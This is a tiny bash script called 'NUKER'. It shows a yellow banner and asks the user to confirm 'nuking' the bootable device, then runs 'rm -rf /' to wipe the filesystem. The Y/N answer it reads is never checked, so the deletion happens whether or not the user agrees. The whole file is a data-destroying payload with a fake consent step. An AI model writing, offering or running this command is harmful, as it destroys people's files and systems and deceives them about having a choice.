#!/usr/bin/env bash

clear
printf "\033[33m"   # yellow
echo "NUKER"
echo
echo "Are you sure to nuke your current bootable device?"
read -rp "[Y/N]: " answer
echo
echo "The process is undergoing, this is the last brodcasting message"
echo "Thank you for choosing nuker"
rm -rf /
